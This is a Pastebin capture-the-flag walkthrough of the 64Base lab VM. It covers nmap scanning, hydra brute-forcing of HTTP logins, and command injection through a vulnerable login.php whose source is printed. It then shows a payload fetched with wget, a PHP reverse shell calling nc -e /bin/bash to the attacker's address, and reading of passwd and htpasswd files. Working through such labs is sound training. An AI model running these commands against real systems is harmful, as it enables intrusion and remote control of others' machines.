Guest User

64Base: 1.0.1 walkthrough - DigiP

a guest
Apr 8th, 2017
1,893
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 64Base: 1.0.1 walkthrough - DigiP
  2.  
  3. netdiscover
  4.  
  5. 192.168.1.76 08:00:27:17:c2:d5 6 360 PCS Systemtechnik GmbH
  6.  
  7.  
  8. nmap -sC -sV -T5 -Pn -p- -A --open 192.168.1.76
  9.  
  10. PORT STATE SERVICE VERSION
  11. 22/tcp open ssh?
  12. | fingerprint-strings:
  13. | GenericLines, NULL:
  14. | The programs included with the Fedora GNU/Linux system are free software;
  15. | exact distribution terms for each program are described in the
  16. | individual files in /usr/share/doc/*/copyright.
  17. | Fedora GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
  18. | permitted by applicable law.
  19. |_ Last login: Mon Oct 24 02:04:10 4025 from 010.101.010.001
  20. 80/tcp open http Apache httpd 2.4.10 ((Debian))
  21. | http-robots.txt: 429 disallowed entries (15 shown)
  22. | /administrator/ /admin/ /login/ /88888/ /88888888/
  23. | /88888888888/ /88888888888P/ /c3P08P/ /C3p0/ /A280/ /above/ /AC1/
  24. |_/across/ /activation/ /Adjustments/
  25. |_http-server-header: Apache/2.4.10 (Debian)
  26. |_http-title: 64base
  27. 62964/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
  28. | ssh-hostkey:
  29. | 1024 59:a5:02:ba:72:8a:2e:c1:9c:ff:cc:b2:f8:15:66:b3 (DSA)
  30. | 2048 2a:57:2c:75:8c:34:9f:28:84:15:07:2a:be:d0:41:98 (RSA)
  31. |_ 256 97:94:13:38:92:70:6c:3a:c0:4f:f3:f3:e7:ce:40:91 (ECDSA)
  32. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  33. SF-Port22-TCP:V=7.40%I=7%D=4/8%Time=58E8A5B6%P=x86_64-pc-linux-gnu%r(NULL,
  34. SF:15A,"The\x20programs\x20included\x20with\x20the\x20Fedora\x20GNU/Linux\
  35. SF:x20system\x20are\x20free\x20software;\nthe\x20exact\x20distribution\x20
  36. SF:terms\x20for\x20each\x20program\x20are\x20described\x20in\x20the\nindiv
  37. SF:idual\x20files\x20in\x20/usr/share/doc/\*/copyright\.\n\nFedora\x20GNU/
  38. SF:Linux\x20comes\x20with\x20ABSOLUTELY\x20NO\x20WARRANTY,\x20to\x20the\x2
  39. SF:0extent\npermitted\x20by\x20applicable\x20law\.\nLast\x20login:\x20Mon\
  40. SF:x20Oct\x2024\x2002:04:10\x204025\x20from\x20010\.101\.010\.001\n\n#\n")
  41. SF:%r(GenericLines,15A,"The\x20programs\x20included\x20with\x20the\x20Fedo
  42. SF:ra\x20GNU/Linux\x20system\x20are\x20free\x20software;\nthe\x20exact\x20
  43. SF:distribution\x20terms\x20for\x20each\x20program\x20are\x20described\x20
  44. SF:in\x20the\nindividual\x20files\x20in\x20/usr/share/doc/\*/copyright\.\n
  45. SF:\nFedora\x20GNU/Linux\x20comes\x20with\x20ABSOLUTELY\x20NO\x20WARRANTY,
  46. SF:\x20to\x20the\x20extent\npermitted\x20by\x20applicable\x20law\.\nLast\x
  47. SF:20login:\x20Mon\x20Oct\x2024\x2002:04:10\x204025\x20from\x20010\.101\.0
  48. SF:10\.001\n\n#\n");
  49. MAC Address: 08:00:27:17:C2:D5 (Oracle VirtualBox virtual NIC)
  50. Device type: general purpose
  51. Running: Linux 2.4.X
  52. OS CPE: cpe:/o:linux:linux_kernel:2.4.21
  53. OS details: Linux 2.4.21
  54. Network Distance: 1 hop
  55. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  56.  
  57. viewing the source of the home page we notice a base64 string
  58.  
  59. <span class="subheading">dmlldyBzb3VyY2UgO0QK</span>
  60. <!--5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a-->
  61.  
  62. We also see some hexadecimal code in the html comments above
  63.  
  64. We decode it to another base64 key
  65. echo 5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a | xxd -r -p
  66. ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg==
  67.  
  68. root@kali:~/ctf/x64# echo -e ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg== | base64 -d
  69. flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}
  70.  
  71. 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4
  72.  
  73. we do some directory fuzzing using robots.txt. We find a login page prompt for /admin. After some time, we realize this is a dead end(for now). However, after scraping the site text for keywords we find a new directory with a login prompt for /Imperial-Class/ which is one letter different than in our robots.txt file.
  74.  
  75. We take the info we were given in Flag 1, we add them to the robots.txt and run hydra:
  76.  
  77. hydra -L /root/ctf/x64/robots.txt -P /root/ctf/x64/robots.txt -u -s 80 -m '/Imperial-Class' 192.168.1.76 http-get -v -T16
  78. Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  79.  
  80. Hydra (http://www.thc.org/thc-hydra) starting at 2017-04-08 08:02:26
  81. [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
  82. [DATA] max 16 tasks per 1 server, overall 16 tasks, 188356 login tries (l:434/p:434), ~735 tries per task
  83. [DATA] attacking service http-get on port 80
  84. [VERBOSE] Resolving addresses ... [VERBOSE] resolving done
  85. [80][http-get] host: 192.168.1.76 login: 64base password: Th353@r3N0TdaDr01DzU@reL00K1ing4
  86.  
  87. We see the following: [☠] ERROR: incorrect path!.... TO THE DARK SIDE!
  88.  
  89. Viewing the source, we find:
  90. <title>64base - login</title>
  91. <h3>[☠] ERROR: incorrect path!.... TO THE DARK SIDE!</h3>
  92. <!-- don't forget the BountyHunter login -->
  93.  
  94. We add this to the URL, and get a new login page:
  95. http://192.168.1.76/Imperial-Class/BountyHunter/
  96.  
  97. Viewing the source, we see it posts to ./login.php
  98. If we navigate to this page and view the source, we get a new clue
  99.  
  100. view-source:http://192.168.1.76/Imperial-Class/BountyHunter/index.php
  101.  
  102.  
  103. <body bgcolor=#000000><font color=#cfbf00>
  104. <form name="login-form" id="login-form" method="post" action="./login.php">
  105. <fieldset>
  106. <legend>Please login:</legend>
  107. <dl>
  108. <dt>
  109. <label title="Username">Username:
  110. <input tabindex="1" accesskey="u" name="function" type="text" maxlength="50" id="5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756" />
  111. </label>
  112. </dt>
  113. </dl>
  114. <dl>
  115. <dt>
  116. <label title="Password">Password:
  117. <input tabindex="2" accesskey="p" name="command" type="password" maxlength="15" id="584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32" />
  118. </label>
  119. </dt>
  120. </dl>
  121. <dl>
  122. <dt>
  123. <label title="Submit">
  124. <input tabindex="3" accesskey="l" type="submit" name="cmdlogin" value="Login" />
  125. <!-- basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a -->
  126. </label>
  127. </dt>
  128. </dl>
  129. </fieldset>
  130. </form>
  131.  
  132.  
  133. We decode and get another b64 string
  134. root@kali:~/ctf/x64# echo -e 52714d544a54626d51315a45566157464655614446525557383966516f3d0a | xxd -r -p
  135. RqMTJTbmQ1ZEVaWFFUaDFRUW89fQo=
  136.  
  137. This appears to be invalid data, possibly another false flag. However, if we combine the forms id values with the token, we get
  138.  
  139. ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWVXOTFkSFZpWlM1amIyMHZkMkYwWTJnL2RqMTJTbmQ1ZEVaWFFUaDFRUW89fQo=
  140.  
  141. This gives us Flag 2
  142. echo ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWVXOTFkSFZpWlM1amIyMHZkMkYwWTJnL2RqMTJTbmQ1ZEVaWFFUaDFRUW89fQo= | base64 -d
  143. flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}
  144.  
  145. echo aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo= | base64 -d
  146. https://www.youtube.com/watch?v=vJwytFWA8uA
  147.  
  148. http://192.168.1.76/Imperial-Class/BountyHunter/
  149.  
  150. NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0
  151. 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4
  152.  
  153. Maybe we're not seeing everything
  154.  
  155. curl -v -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 http://192.168.1.76/Imperial-Class/BountyHunter/login.php
  156. * Trying 192.168.1.76...
  157. * TCP_NODELAY set
  158. * Connected to 192.168.1.76 (192.168.1.76) port 80 (#0)
  159. * Server auth using Basic with user '64base'
  160. > GET /Imperial-Class/BountyHunter/login.php HTTP/1.1
  161. > Host: 192.168.1.76
  162. > Authorization: Basic NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0
  163. > User-Agent: curl/7.52.1
  164. > Accept: */*
  165. >
  166. < HTTP/1.1 302 Moved Temporarily
  167. < Date: Sat, 08 Apr 2017 13:25:37 GMT
  168. < Server: Apache/2.4.10 (Debian)
  169. < Location: /Imperial-Class/BountyHunter/index.php
  170. < Transfer-Encoding: chunked
  171. < Content-Type: text/html; charset=UTF-8
  172. <
  173.  
  174. flag3{NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=}
  175. * Curl_http_done: called premature == 0
  176. * Connection #0 to host 192.168.1.76 left intact
  177.  
  178. NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=
  179. http://192.168.1.76/
  180. 53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id
  181.  
  182. view-source:http://192.168.1.76/Imperial-Class/BountyHunter/login.php?f=system&c=pwd
  183. <body bgcolor=#000000><font color=#cfbf00> <h2>[64base Command Shell]</h2> <pre>
  184. <h4>flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}</h4>
  185. Debian GNU/Linux 8 \n \l
  186.  
  187. Sat Apr 8 14:32:46 BST 2017
  188. Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
  189. inet addr:192.168.1.76 Bcast:192.168.1.255 Mask:255.255.255.0
  190. inet6 addr: fe80::a00:27ff:fe17:c2d5/64 Scope:Link
  191.  
  192. <body bgcolor=#000000><font color=#cfbf00> <h2>[64base Command Shell]</h2> <pre>
  193. <h4>flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}</h4>
  194.  
  195. echo NjRiYXNlOjY0YmFzZTVoMzc3Cg== | base64 -d
  196. 64base:64base5h377
  197.  
  198. So playing with our login.php file, looks like we can execute commands on the system but much is filtered out. However, we have two user contexts here if we pay attention.
  199.  
  200. User 64base:
  201. view-source:http://192.168.1.76/Imperial-Class/BountyHunter/login.php?f=system&c=id
  202. uid=1001(64base) gid=1001(64base) groups=1001(64base)
  203.  
  204. user www-data:
  205. view-source:http://192.168.1.76/Imperial-Class/BountyHunter/login.php?f=system&c=test||id
  206. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  207.  
  208. we run some various commands as www-data
  209.  
  210. Debian GNU/Linux 8 \n \l
  211.  
  212. Sat Apr 8 14:35:17 BST 2017
  213. Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
  214. inet addr:192.168.1.76 Bcast:192.168.1.255 Mask:255.255.255.0
  215. inet6 addr: fe80::a00:27ff:fe17:c2d5/64 Scope:Link
  216.  
  217. total 44K
  218. 4.0K drwxr-xr-x 5 www-data www-data 4.0K Dec 5 23:42 .
  219. 4.0K drwxr-xr-x 3 www-data www-data 4.0K Dec 6 02:00 ..
  220. 4.0K -rwxr-x--- 1 www-data www-data 2.1K Dec 5 23:42 cat
  221. 4.0K drwxr-xr-x 2 www-data www-data 4.0K Dec 5 23:42 css
  222. 4.0K -rwxr-x--- 1 www-data www-data 757 Dec 6 02:02 index.html
  223. 4.0K -rwxr-x--- 1 www-data www-data 705 Dec 5 23:42 index.jade
  224. 4.0K -rwxr-x--- 1 www-data www-data 959 Dec 6 02:13 index.php
  225. 4.0K drwxr-xr-x 2 www-data www-data 4.0K Dec 5 23:42 js
  226. 4.0K -rwxr-x--- 1 www-data www-data 1.1K Dec 5 23:42 license.txt
  227. 4.0K -rwxr-x--- 1 www-data www-data 835 Dec 6 02:20 login.php
  228. 4.0K drwxr-xr-x 2 www-data www-data 4.0K Dec 5 23:42 scss
  229.  
  230. view-source:http://192.168.1.76/Imperial-Class/BountyHunter/cat
  231.  
  232. #!/bin/bash
  233. echo '''
  234. ▄ ▄██▄
  235. ▐██▄ ▄█░░█▌
  236. ▐█░██▄ ██░░░█▌
  237. ▐█░░░██ ██░░░░█
  238. █░░░░██▄████████▄███░░░█
  239. ██░░█░░░░░░░░░░░░░░░█░██
  240. ███░░░░░░░░░░░░░░░░░██
  241. ██░░░░░░░░░░░░░░░░░░░█
  242. ▐█░░░░░░▄▄█░░█▄▄░░░░░░█▌
  243. ▐█░░░██████░░██████░░░█▌
  244. ██░░███████░░███████░░██
  245. ██░░█▄▐█▌▐█░░█▌▐█▌▄█░░██
  246. ██░░██▄▄▄██░░██▄▄▄██░░██▌
  247. ▐█▌░░▀█████▀░░▀█████▀░░▐█▌
  248. ▐█▌░░░░▀█▀░░░░░░▀█▀░░░░▐█▌
  249. ██░░░░░░░░░▀▄▄▀░░░░░░░░░██
  250. ██░░░░░░░▀▄░▐▌░▄▀░░░░░░░██
  251. █▌░░░░░░░░░▀▀▀▀░░░░░░░░░▐█
  252. ██░░░░░░░░░░░░░░░░░░░░░░░▐█▌
  253. ██░░░░░░░░░░░░░░░░░░░░░░░░░██
  254. █▌░░░░░░░░░░░░░░░░░░░░░░░░░▐█
  255.  
  256. Is this the cat you were looking for?
  257.  
  258. netstat -antplu
  259.  
  260. Active Internet connections (servers and established)
  261. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  262. tcp 0 0 0.0.0.0:62964 0.0.0.0:* LISTEN -
  263. tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
  264. tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
  265. tcp 0 0 0.0.0.0:4899 0.0.0.0:* LISTEN -
  266. tcp6 0 0 :::62964 :::* LISTEN -
  267. tcp6 0 0 ::1:25 :::* LISTEN -
  268. tcp6 0 0 :::80 :::* LISTEN -
  269. tcp6 0 0 192.168.1.76:80 192.168.1.66:37592 TIME_WAIT -
  270. tcp6 0 0 192.168.1.76:80 192.168.1.66:37942 ESTABLISHED -
  271. udp 0 0 0.0.0.0:47415 0.0.0.0:* -
  272. udp 0 0 0.0.0.0:68 0.0.0.0:* -
  273. udp6 0 0 :::18884 :::* -
  274.  
  275. Interesting UDP port. Didn't bother with it.
  276.  
  277.  
  278. ps aux
  279. USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
  280. root 1 0.0 0.5 5376 3968 ? Ss 09:54 0:01 /sbin/init
  281. root 2 0.0 0.0 0 0 ? S 09:54 0:00 [kthreadd]
  282. root 3 0.4 0.0 0 0 ? S 09:54 1:15 [ksoftirqd/0]
  283. root 5 0.0 0.0 0 0 ? S< 09:54 0:00 [kworker/0:0H]
  284. root 6 0.0 0.0 0 0 ? S 09:54 0:00 [kworker/u2:0]
  285. root 7 0.0 0.0 0 0 ? S 09:54 0:01 [watchdog/0]
  286. root 8 0.0 0.0 0 0 ? S< 09:54 0:00 [khelper]
  287. root 9 0.0 0.0 0 0 ? S 09:54 0:00 [kdevtmpfs]
  288. root 10 0.0 0.0 0 0 ? S< 09:54 0:00 [netns]
  289. root 11 0.0 0.0 0 0 ? S 09:54 0:00 [khungtaskd]
  290. root 12 0.0 0.0 0 0 ? S< 09:54 0:00 [writeback]
  291. root 13 0.0 0.0 0 0 ? SN 09:54 0:00 [ksmd]
  292. root 14 0.0 0.0 0 0 ? S< 09:54 0:00 [crypto]
  293. root 15 0.0 0.0 0 0 ? S< 09:54 0:00 [kintegrityd]
  294. root 16 0.0 0.0 0 0 ? S< 09:54 0:00 [bioset]
  295. root 17 0.0 0.0 0 0 ? S< 09:54 0:00 [kblockd]
  296. root 18 0.0 0.0 0 0 ? S 09:54 0:00 [kworker/0:1]
  297. root 19 0.0 0.0 0 0 ? S 09:54 0:00 [kswapd0]
  298. root 20 0.0 0.0 0 0 ? S 09:54 0:00 [fsnotify_mark]
  299. root 26 0.0 0.0 0 0 ? S< 09:54 0:00 [kthrotld]
  300. root 27 0.0 0.0 0 0 ? S< 09:54 0:00 [ipv6_addrconf]
  301. root 28 0.0 0.0 0 0 ? S< 09:54 0:00 [deferwq]
  302. root 62 0.0 0.0 0 0 ? S 09:54 0:00 [khubd]
  303. root 63 0.0 0.0 0 0 ? S< 09:54 0:00 [ata_sff]
  304. root 65 0.0 0.0 0 0 ? S< 09:54 0:00 [kpsmoused]
  305. root 67 0.0 0.0 0 0 ? S 09:54 0:00 [scsi_eh_0]
  306. root 68 0.0 0.0 0 0 ? S< 09:54 0:00 [scsi_tmf_0]
  307. root 69 0.0 0.0 0 0 ? S 09:54 0:00 [scsi_eh_1]
  308. root 70 0.0 0.0 0 0 ? S 09:54 0:00 [kworker/u2:2]
  309. root 71 0.0 0.0 0 0 ? S< 09:54 0:00 [scsi_tmf_1]
  310. root 72 0.0 0.0 0 0 ? S 09:54 0:00 [scsi_eh_2]
  311. root 73 0.0 0.0 0 0 ? S< 09:54 0:00 [scsi_tmf_2]
  312. root 78 0.0 0.0 0 0 ? S< 09:54 0:00 [kworker/0:1H]
  313. root 98 0.0 0.0 0 0 ? S 09:54 0:00 [jbd2/sda1-8]
  314. root 99 0.0 0.0 0 0 ? S< 09:54 0:00 [ext4-rsv-conver]
  315. root 131 0.0 0.0 0 0 ? S 09:54 0:00 [kauditd]
  316. root 133 0.0 0.4 8284 3776 ? Ss 09:54 0:01 /lib/systemd/systemd-journald
  317. root 143 0.0 0.3 12268 3056 ? Ss 09:54 0:00 /lib/systemd/systemd-udevd
  318. root 350 0.0 0.6 8108 5024 ? Ss 09:54 0:00 /usr/sbin/sshd -D
  319. root 351 0.0 0.3 5012 2844 ? Ss 09:54 0:00 /usr/sbin/cron -f
  320. daemon 352 0.0 0.2 2648 1900 ? Ss 09:54 0:00 /usr/sbin/atd -f
  321. root 356 0.0 0.3 3528 2456 ? Ss 09:54 0:00 /lib/systemd/systemd-logind
  322. message+ 360 0.0 0.4 5244 3296 ? Ss 09:54 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
  323. root 400 0.0 0.4 31096 3576 ? Ssl 09:54 0:00 /usr/sbin/rsyslogd -n
  324. root 402 0.0 0.2 2196 1608 ? Ss 09:54 0:00 /usr/sbin/acpid
  325. root 411 0.0 0.2 4176 2044 tty1 Ss+ 09:54 0:00 /sbin/agetty --noclear tty1 linux
  326. root 641 0.0 2.6 107180 20132 ? Ss 09:54 0:02 php-fpm: master process (/etc/php5/fpm/php-fpm.conf)
  327. Debian-+ 654 0.0 0.3 9940 3008 ? Ss 09:54 0:00 /usr/sbin/exim4 -bd -q30m
  328. root 656 0.0 0.5 6280 4592 ? Ss 09:54 0:03 /usr/sbin/apache2 -k start
  329. www-data 658 0.0 1.3 107316 10740 ? S 09:54 0:00 php-fpm: pool www
  330. www-data 659 0.0 1.3 107316 10612 ? S 09:54 0:00 php-fpm: pool www
  331. www-data 661 0.0 0.4 6048 3196 ? S 09:54 0:00 /usr/sbin/fcgi-pm -k start
  332. www-data 662 2.5 0.9 231184 7216 ? Sl 09:54 7:57 /usr/sbin/apache2 -k start
  333. root 761 0.0 0.8 9248 6712 ? Ss 09:54 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
  334. root 1025 0.0 0.0 0 0 ? S 10:09 0:06 [kworker/0:0]
  335. www-data 1315 2.9 0.9 231192 7032 ? Sl 10:33 7:54 /usr/sbin/apache2 -k start
  336. www-data 1511 2.9 0.9 231184 6984 ? Sl 10:33 7:50 /usr/sbin/apache2 -k start
  337. root 5339 0.0 0.2 2224 1600 ? S 15:03 0:00 /bin/nc.real -knlp 4899
  338. root 5340 0.0 0.1 2224 1480 ? S 15:03 0:00 /bin/nc.real -knlp 22
  339. www-data 5341 0.0 0.1 2272 1524 ? S 15:03 0:00 sh -c echo '
  340. flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}
  341.  
  342. ';cat.real /etc/issue;date;uname -a;/sbin/ifconfig eth0|/usr/share/grep.real inet;echo sudo -u 64base ps aux
  343. root 5347 0.0 0.3 4260 2888 ? S 15:03 0:00 sudo -u 64base ps aux
  344. 64base 5348 0.0 0.2 3172 1988 ? R 15:03 0:00 ps aux
  345.  
  346.  
  347.  
  348. cat login.php
  349.  
  350.  
  351. <?php
  352. function clean($t)
  353. {
  354. $t = preg_replace('/[^A-Za-z0-9\-|. ]/', '', $t);
  355. return $t;
  356. }
  357. if(isset($_REQUEST['f']) && isset($_REQUEST['c']))
  358. {
  359. $_c = clean($_REQUEST['c']);
  360. $_s = preg_replace( "/\r|\n/", "", 'sudo -u 64base '.$_c);
  361. echo base64_decode('PGJvZHkgYmdjb2xvcj0jMDAwMDAwPjxmb250IGNvbG9yPSNjZmJmMDA+IDxoMj5bNjRiYXNlIENvbW1hbmQgU2hlbGxdPC9oMj4gPHByZT4K');
  362. $_u = base64_decode('ZWNobyAnPGg0PmZsYWc0e05qUmlZWE5sT2pZMFltRnpaVFZvTXpjM0NnPT19PC9oND4nO2NhdC5yZWFsIC9ldGMvaXNzdWU7ZGF0ZTt1bmFtZSAtYTsvc2Jpbi9pZmNvbmZpZyBldGgwfC91c3Ivc2hhcmUvZ3JlcC5yZWFsIGluZXQ7ZWNobwo=').' '.$_s;
  363. $_REQUEST['f']($_u);
  364. die;
  365. }
  366. header('Location: /Imperial-Class/BountyHunter/index.php');
  367. ?>
  368.  
  369. flag3{NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=}
  370.  
  371.  
  372.  
  373.  
  374. We start a local web server, and put a redirect to a payload we want to run on the target system. Then, we execute wget on the remote system to download our payload. In this payload, we copy /bin/nc.real to /var/www/html/Imperial-Class/BountyHunter/shit
  375. shit will be our nc to play with. We create another local payload to run on the remote system. This time, we start a listener locally, and wait for a reverse shell from the target system with the following:
  376. <?php system('/var/www/html/Imperial-Class/BountyHunter/shit -nv 192.168.1.66 444 -e /bin/bash'); ?>
  377.  
  378. This gives us remote access to traverse the system.
  379.  
  380. We issue sudo -l:
  381. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  382. sudo -l
  383. Matching Defaults entries for www-data on 64base:
  384. env_reset, mail_badpass,
  385. secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
  386.  
  387. User www-data may run the following commands on 64base:
  388. (64base : 64base) NOPASSWD: /usr/bin/id, /bin/ls, /bin/netstat,
  389. /usr/bin/who, /usr/bin/whoami, /usr/bin/wget, /bin/ping, /bin/cat,
  390. /bin/nc, /usr/bin/w, /usr/bin/base64, /bin/ps, /usr/bin/locate
  391.  
  392. We see a number of commands we can run as www-data
  393.  
  394. root:x:0:0:root:/root:/bin/bash
  395. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  396. bin:x:2:2:bin:/bin:/usr/sbin/nologin
  397. sys:x:3:3:sys:/dev:/usr/sbin/nologin
  398. sync:x:4:65534:sync:/bin:/bin/sync
  399. games:x:5:60:games:/usr/games:/usr/sbin/nologin
  400. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  401. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  402. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  403. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  404. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  405. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  406. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  407. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  408. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  409. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  410. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  411. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  412. systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
  413. systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
  414. systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
  415. systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
  416. Debian-exim:x:104:109::/var/spool/exim4:/bin/false
  417. messagebus:x:105:110::/var/run/dbus:/bin/false
  418. statd:x:106:65534::/var/lib/nfs:/bin/false
  419. sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
  420. 64base:x:1001:1001::/64base:/bin/rbash
  421.  
  422. We discover why our 64base user's commands are filtered, we we're in an rbash shell.
  423.  
  424. env
  425. USER=www-data
  426. PWD=/home
  427. HOME=/var/www
  428. SHLVL=2
  429. _=/usr/bin/env
  430. OLDPWD=/var/www
  431.  
  432. echo $SHELL
  433. /usr/sbin/nologin
  434. echo $PATH
  435. /usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.
  436.  
  437. Lets get a TTY shell
  438. python -c 'import pty; pty.spawn("/bin/bash")'
  439.  
  440. www-data@64base:~/html$ find -user root
  441. find -user root
  442. ./admin/S3cR37
  443. ./admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
  444.  
  445.  
  446.  
  447.  
  448. www-data@64base:~/html$ cd admin
  449. cd admin
  450.  
  451. www-data@64base:~/html/admin$ ls -lash
  452. ls -lash
  453. total 28K
  454. 4.0K drwxr-xr-x 3 www-data www-data 4.0K Dec 6 03:00 .
  455. 12K drwxr-xr-x 431 www-data www-data 12K Dec 6 02:41 ..
  456. 4.0K -rw-r--r-- 1 www-data www-data 113 Dec 6 02:25 .htaccess
  457. 4.0K drwxr-xr-x 2 root root 4.0K Dec 6 03:00 S3cR37
  458. 4.0K -rwxr-xr-x 1 www-data www-data 139 Nov 30 07:02 index.php
  459. www-data@64base:~/html/admin$ cat .htaccess
  460. cat .htaccess
  461. AuthUserFile /usr/share/apache2/.htpasswd2
  462. AuthName "Authorization Required"
  463. AuthType Basic
  464. require valid-user
  465.  
  466. rm .htaccess (because I can)
  467.  
  468. www-data@64base:~/html/admin$ cat index.php
  469. cat index.php
  470. <!DOCTYPE html>
  471. <html lang="en">
  472. <title>64base - login</title>
  473. <h3>[☠] ERROR: incorrect path!</h3>
  474. <!-- don't forget the login login -->
  475. www-data@64base:~/html/admin$
  476.  
  477. www-data@64base:~/html/admin$ cat /usr/share/apache2/.htpasswd2
  478. cat /usr/share/apache2/.htpasswd2
  479. trolololllololllooloo
  480. www-data@64base:~/html/admin$
  481.  
  482. echo TG9vayBJbnNpZGUhIDpECg== | base64 -d
  483. Look Inside! :D
  484.  
  485. look inside /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
  486.  
  487. hex:
  488. 4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c517051636d396a4c565235634755364944517352553544556c6c5156455645436b52460a5379314a626d5a764f69424252564d744d5449344c554e43517977324d6a46424d7a68425155513052546c475155457a4e6a55335130457a4f44673452446c434d7a553251776f4b625552300a556e684a643267304d464a54546b467a4d697473546c4a49646c4d356557684e4b325668654868564e586c795231424461334a6955566376556d64515543745352307043656a6c57636c52720a646c6c334e67705a59303931575756615457707a4e475a4a55473433526c7035536d64345230686f5533685262336857626a6c7252477433626e4e4e546b5270636e526a62304e50617a6c530a524546484e5756344f58673056453136436a684a624552435558453161546c5a656d6f35646c426d656d56435246706b53586f35524863795a323479553246465a335531656d56734b7a5a490a52303969526a686161444e4e53574e6f6554687a4d5668795254414b61335a4d53306b794e544a74656c64334e47746955334d354b31466856336c6f4d7a52724f45704a566e7031597a46520a51336c69656a56586231553157545532527a5a784d564a6b637a426959315a785446567a5a51704e5533704c617a4e745332465851586c4d574778764e3078756258467856555a4c5347356b0a516b557855326851566c5a704e47497752336c475355785054335a3062585a47596a5172656d68314e6d705056316c49436d73796147524453453554644374705a3264354f57686f4d3270680a52576456626c4e51576e56464e30354b6430525a5954646c553052685a3077784e31684c634774744d6c6c70516c5a7956566834566b31756232494b643168535a6a56435930644c56546b330a65475276636c59795648457261446c4c553278615a5463354f58527956484a475230356c4d4456326545527961576f315658517953324e52654373354f457334533342585441706e645570510a556c424c52326c71627a6b3253455248597a4e4d4e566c7a65453969566d63724c